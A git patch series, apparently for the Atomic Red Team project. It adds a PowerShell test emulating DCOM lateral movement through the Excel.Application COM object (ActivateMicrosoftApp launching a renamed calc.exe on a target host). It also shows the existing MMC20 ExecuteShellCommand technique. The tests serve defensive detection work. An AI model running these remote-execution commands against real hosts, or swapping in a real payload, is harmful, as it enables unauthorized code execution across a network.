From cf46249bc86c68174d01755fc41e05a6f029e10b Mon Sep 17 00:00:00 2001 From: Kostas Date: Wed, 1 Nov 2023 13:40:48 -0700 Subject: [PATCH 1/9] New Atomic - Excel Application Object for LM --- atomics/T1021.003/T1021.003.md | 60 ++++++++++++++++++++++++++++++++ atomics/T1021.003/T1021.003.yaml | 40 +++++++++++++++++++++ 2 files changed, 100 insertions(+) diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index a14d9d78..7e46f70a 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -11,6 +11,7 @@ Through DCOM, adversaries operating in the context of an appropriately privilege ## Atomic Tests - [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20) +- [Atomic Test #2 - PowerShell Lateral Movement using Excel Application](#atomic-test-2---powershell-lateral-movement-using-excel-application)
@@ -47,8 +48,67 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. ``` +
+## Atomic Test #2 - PowerShell Lateral Movement using Excel Application +Powershell lateral movement via Excel Application COM objects. + +Reference: + +https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 + + +Upon successful execution, cmd will spawn calc.exe on a remote computer. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** b46d327c-c336-43d9-906e-d53be5358535 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| hostname | Hostname or IP | string | localhost| +| user | Name of user | string | admin + + +#### Attack Commands: Run with `powershell`! + + +```powershell +copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' +$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost")) +$com.ActivateMicrosoftApp("5") +``` + + +#### Cleanup Commands: +```powershell +Stop-Process -Name "foxprow.exe" -ErrorAction Ignore +Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Excel must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "Excel.Application" | Out-Null + Stop-Process -Name "Excel" + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Excel manually to meet this requirement" +```
diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 233c88eb..2419c973 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -22,3 +22,43 @@ atomic_tests: command: | [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") name: powershell +- name: PowerShell Lateral Movement Using Excel Application Object + auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535 + description: | + Powershell lateral movement using the Excel COM objects. + + Reference: + + https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 + + Upon successful execution, cmd will spawn calc.exe on a remote computer. + supported_platforms: + - windows + dependencies: + - description: | + Microsoft Excel must be installed + prereq_command: | + try { + New-Object -COMObject "Excel.Application" | Out-Null + Stop-Process -Name "Excel" + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Excel manually to meet this requirement" + cleanup_command: | + Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' + input_arguments: + computer_name: hostname + description: Hostname or IP + type: string + default: localhost + user: + description: Name of user + type: string + default: admin + executor: + command: | + copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' + $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost")) + $com.ActivateMicrosoftApp("5") + name: powershell From c74a2d309ebef0541a6f9f863ef8a3cdf5014c3f Mon Sep 17 00:00:00 2001 From: Kostas Date: Wed, 1 Nov 2023 15:00:14 -0700 Subject: [PATCH 2/9] Update T1021.003.yaml Removed auto_generated_guid --- atomics/T1021.003/T1021.003.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 2419c973..0da360b2 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -23,7 +23,6 @@ atomic_tests: [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") name: powershell - name: PowerShell Lateral Movement Using Excel Application Object - auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535 description: | Powershell lateral movement using the Excel COM objects. From fa4a6ed20b921ae19814bec2aad0de978711b3a7 Mon Sep 17 00:00:00 2001 From: Kostas Date: Wed, 1 Nov 2023 15:00:34 -0700 Subject: [PATCH 3/9] Update T1021.003.md Removed auto_generated_guid --- atomics/T1021.003/T1021.003.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index 7e46f70a..98541c43 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -64,10 +64,6 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer. **Supported Platforms:** Windows -**auto_generated_guid:** b46d327c-c336-43d9-906e-d53be5358535 - - - #### Inputs: From f3e33ee0b46ce92ff0cb4e9f7f5e08cbb09c5a05 Mon Sep 17 00:00:00 2001 From: Kostas Date: Thu, 2 Nov 2023 00:18:17 -0700 Subject: [PATCH 4/9] Update T1021.003.yaml Fixing yaml error --- atomics/T1021.003/T1021.003.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 0da360b2..314c9d41 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -23,6 +23,7 @@ atomic_tests: [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") name: powershell - name: PowerShell Lateral Movement Using Excel Application Object + auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535 description: | Powershell lateral movement using the Excel COM objects. @@ -47,7 +48,7 @@ atomic_tests: cleanup_command: | Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' input_arguments: - computer_name: hostname + hostname: description: Hostname or IP type: string default: localhost From 85eefc4349e082924dfb58af3135eed3d1cf0b8c Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 2 Nov 2023 12:57:03 -0400 Subject: [PATCH 5/9] Delete atomics/T1021.003/T1021.003.md --- atomics/T1021.003/T1021.003.md | 110 --------------------------------- 1 file changed, 110 deletions(-) delete mode 100644 atomics/T1021.003/T1021.003.md diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md deleted file mode 100644 index 98541c43..00000000 --- a/atomics/T1021.003/T1021.003.md +++ /dev/null @@ -1,110 +0,0 @@ -# T1021.003 - Remote Services: Distributed Component Object Model -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003) -
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. - -The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM) - -Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL) - -Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
- -## Atomic Tests - -- [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20) -- [Atomic Test #2 - PowerShell Lateral Movement using Excel Application](#atomic-test-2---powershell-lateral-movement-using-excel-application) - - -
- -## Atomic Test #1 - PowerShell Lateral Movement using MMC20 -Powershell lateral movement using the mmc20 application com object. - -Reference: - -https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ - -Upon successful execution, cmd will spawn calc.exe on a remote computer. - -**Supported Platforms:** Windows - - -**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| computer_name | Name of Computer | string | localhost| - - -#### Attack Commands: Run with `powershell`! - - -```powershell -[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -``` - - -
- - -## Atomic Test #2 - PowerShell Lateral Movement using Excel Application -Powershell lateral movement via Excel Application COM objects. - -Reference: - -https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - - -Upon successful execution, cmd will spawn calc.exe on a remote computer. - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| hostname | Hostname or IP | string | localhost| -| user | Name of user | string | admin - - -#### Attack Commands: Run with `powershell`! - - -```powershell -copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' -$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost")) -$com.ActivateMicrosoftApp("5") -``` - - -#### Cleanup Commands: -```powershell -Stop-Process -Name "foxprow.exe" -ErrorAction Ignore -Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' -``` - - - -#### Dependencies: Run with `powershell`! -##### Description: Microsoft Excel must be installed -##### Check Prereq Commands: -```powershell -try { - New-Object -COMObject "Excel.Application" | Out-Null - Stop-Process -Name "Excel" - exit 0 -} catch { exit 1 } -``` -##### Get Prereq Commands: -```powershell -Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -``` - - -
From 31e78421667d3af2f3fcbf0ce8ddf1f545613b89 Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 2 Nov 2023 12:59:54 -0400 Subject: [PATCH 6/9] Update T1021.003.yaml removing auto-generated UUID --- atomics/T1021.003/T1021.003.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 314c9d41..46e5b655 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -2,7 +2,6 @@ attack_technique: T1021.003 display_name: 'Remote Services: Distributed Component Object Model' atomic_tests: - name: PowerShell Lateral Movement using MMC20 - auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 description: | Powershell lateral movement using the mmc20 application com object. From 4e38b6d8766af3828cee83fb2ed73481e907ae0f Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 2 Nov 2023 13:07:02 -0400 Subject: [PATCH 7/9] Update T1021.003.yaml --- atomics/T1021.003/T1021.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 46e5b655..7c9a27da 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -2,6 +2,7 @@ attack_technique: T1021.003 display_name: 'Remote Services: Distributed Component Object Model' atomic_tests: - name: PowerShell Lateral Movement using MMC20 + auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 description: | Powershell lateral movement using the mmc20 application com object. @@ -22,7 +23,6 @@ atomic_tests: [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") name: powershell - name: PowerShell Lateral Movement Using Excel Application Object - auto_generated_guid: b46d327c-c336-43d9-906e-d53be5358535 description: | Powershell lateral movement using the Excel COM objects. From ab386927c89732a2735baed351db76a103d83031 Mon Sep 17 00:00:00 2001 From: Kostas Date: Thu, 2 Nov 2023 11:33:59 -0700 Subject: [PATCH 8/9] Update T1021.003.yaml Changed hostname field name to computer_name --- atomics/T1021.003/T1021.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 7c9a27da..e9f822f0 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -47,7 +47,7 @@ atomic_tests: cleanup_command: | Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' input_arguments: - hostname: + computer_name: description: Hostname or IP type: string default: localhost From 60fe9e1b3f89077afd03bd45cdaea0ede8b5cf1b Mon Sep 17 00:00:00 2001 From: Kostas Date: Thu, 2 Nov 2023 20:22:49 -0700 Subject: [PATCH 9/9] Update T1021.003.yaml --- atomics/T1021.003/T1021.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index e9f822f0..00af884c 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -58,6 +58,6 @@ atomic_tests: executor: command: | copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe' - $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost")) + $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}")) $com.ActivateMicrosoftApp("5") name: powershell